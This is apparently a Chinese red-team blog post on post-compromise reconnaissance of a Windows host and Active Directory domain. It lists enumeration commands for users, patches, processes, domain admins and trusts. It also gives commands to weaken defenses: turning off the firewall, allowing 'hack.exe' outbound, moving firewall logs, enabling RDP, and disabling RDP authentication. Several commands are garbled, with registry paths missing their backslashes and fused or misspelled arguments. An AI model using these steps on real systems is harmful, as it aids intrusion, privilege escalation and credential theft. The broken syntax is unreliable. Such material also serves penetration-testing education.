getshell后的信息收集（红队攻防篇章一）

朋友们现在只对常读和星标的公众号才展示大图推送，建议大家把"无影安全实验室"设为星标，这样更新文章也能第一时间推送！

安全文章

二、测试是否出网，可以ping某度或者114.114.114.114，有时候可能只支持dns出网，因为dns协议对于很多业务都可能需要用到，这个时候可以考虑做dns隧道

三、判断是否存在域环境，可以看到存在主DNS后缀wuying.com和DNS后缀wuying.com,则证明是加入了域的，如果是普通工作组的电脑，是不会有主DNS后缀的

用shell systeminfo命令也可以看到是否存在域,如果域的后边是WORKGROUP，则代表是没有加入域的，就是普通工作组的计算机

下方的为加入域的情况：

没加入域，显示WORKGROUP

四、ipconfig /all   收集主机的网段信息，便于我们发现更多网段的资产，也可以利用一些工具，例如netspy去测试当前可通的网段。可通的网段越多，资产也就越多，资产多也就代表我们有更多机会拿到域内其他主机的权限。

五、查询操作系统和版本信息

知道了当前系统的版本号后，假设我们权限是⼀个普通⽤户权限，我们想要提权为 SYSTEM或者其他⾼权限，那么我们就可以针对性的去搜集这个操作系统的提权漏洞，这也是收集信息的目的之一。

英⽂版系统⽤这条命令：
systeminfo | findstr /B /C:"OS Nmae" /C:"OS Version"

中⽂版系统⽤这条命令：
systeminfo | findstr /B /C:"OS名称" /C:"OS 版本"

六、查询目标体系架构，查体系架构的目的是为了判断当前拿下的机器可以运行什么工具，因为工具不一定都是amd，也有arm架构的等等，所以需要考虑兼容性的问题。
使用命令：
echo %PROCESSOR_ARCHITECTURE%

七、查看安装的软件和版本信息

通过搜集当前本机安装了那些软件后，我们就知道当前机器的使⽤情况，⽐如某个软件某个版本有⼀些溢出、提权漏洞、比如查看如果到安装了向日葵，可以利用向日葵的漏洞直接远程连接到桌面。
使用命令：wmic product get name,version

八、查看进程列表和对应的身份，通过执⾏这条命令我们可以知道每个进程对应的⽤户，是那个⽤户启动的这个软件，但是这条命令只能看到和你⼀样级别或者⽐你低权限的⽤户的进程，主要是用来配合做进程注入横向渗透，也是比较常用的。
Tasklist /v

九、查看主机开机时间，判断管理员是否经常开关机，是否经常使用

十、查看本地账户
工作组环境命令：net user

域环境命令：net user /domain

十一、查看当前在线的用户

使用命令：query user || qwinsta

十二、查看端口的开放情况，例如判断3389是否开启，开启的话，可以进行远程登录，或者数据库3306等等。

十三、查补丁信息，根据补丁信息，可以判断某个漏洞是否修复，补丁打得越少，漏洞出现的概率越大，例如MS16-032来尝试提权，对应的补丁编号是KB3139914，如果没有这个补丁，且版本号符合漏洞针对的版本范围，则漏洞存在，可以进行利用。

systeminfo

十四、查询路由表及所有可⽤接⼝的ARP缓冲表

route print

arp-a

十五、查看防火墙配置情况

netsh firewall show config   (操作模式为禁用则代表防火墙是关闭的)

修改防⽕墙配置信息就可以使⽤：

允许指定程序连出，命令如下

netsh advfirewall firewall add rule name="Allow hack" dir=out action=allow program="C:hack.exe"

⾃定义防⽕墙⽇志储存位置

netsh advfirewall set currentprofile logging filename "C:windowstempfw.log"

允许 3389 端⼝放⾏，命令如下

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=inlocalport=3389 action=allow

若是想要关闭防⽕墙就可以使⽤：

win 2003及之前的版本⽤这条命令：

netsh firewall set opmode disable

win 2003之后的版本⽤这条命令：

netsh advfirewall set allprofiles state off

十六、查询远程桌面服务是否开启，开启远程桌面

REGQUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /V PortNumber

查看远程桌⾯服务是否开启，在cmd 下使⽤注册表查询语句，命令如下，得到连接端⼝为 0xd3d，转换后为3389

以下为一些3389端口开启的命令：

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

或者:
REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

3389任意版本连接

reg add "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

 域内信息搜集

一、获取域SID，结合进行票据服务攻击

二、查询域内⽤户

net user /domain

通过查询域内⽤户我们可以知道这个域内所有⽤户名，可以判断域的大小。

三、查看域⽤户的详细信息
假如我们要查询 win2012这个域⽤户的信息，我们就可以使⽤：

net user win2012 /domain 由下两张图可知win2012为普通域用户，而administrator是域管用户

四、查询域管理员列表

net group "domain admins" /domain

由上图可知域管理员有一个：Administrator

五、查看域内时间

net time /domain

通过查看时间可以知道域内时间，方便我们制定计划任务等，通过以上命令还可以知道域控的计算机名，ping计算机名可以得到域控IP

六、查看域内所有⽤户组列表

net group /domain

查看域有哪些⽤户组我们可以知道每个组是做什么的，⽐如⼀些⼤型企业或者集团会有 财务组、运维组等等，例如要攻破运维组用户去拿数据库的账号密码等等，分清楚哪些是是运维组用户就特别关键。

七、收集域用户详细信息

wmic useraccount get /all

八、查看那个是主域控制器

netdom query pdc

我们就可以知道当前域的域控就是 AD-2016 这台机器。

九、查询域信任信息

nltest /domain_trusts

通过查询域信任信息我们就可以知道当前有多少个域，域名是多少，信任域又分为单向信任和双向信任。

下章将讲述如何收集内网密码凭证，感兴趣的小伙伴点个关注叭！！！

原文始发于微信公众号（无影安全实验室）：getshell后的信息收集（红队攻防篇章一）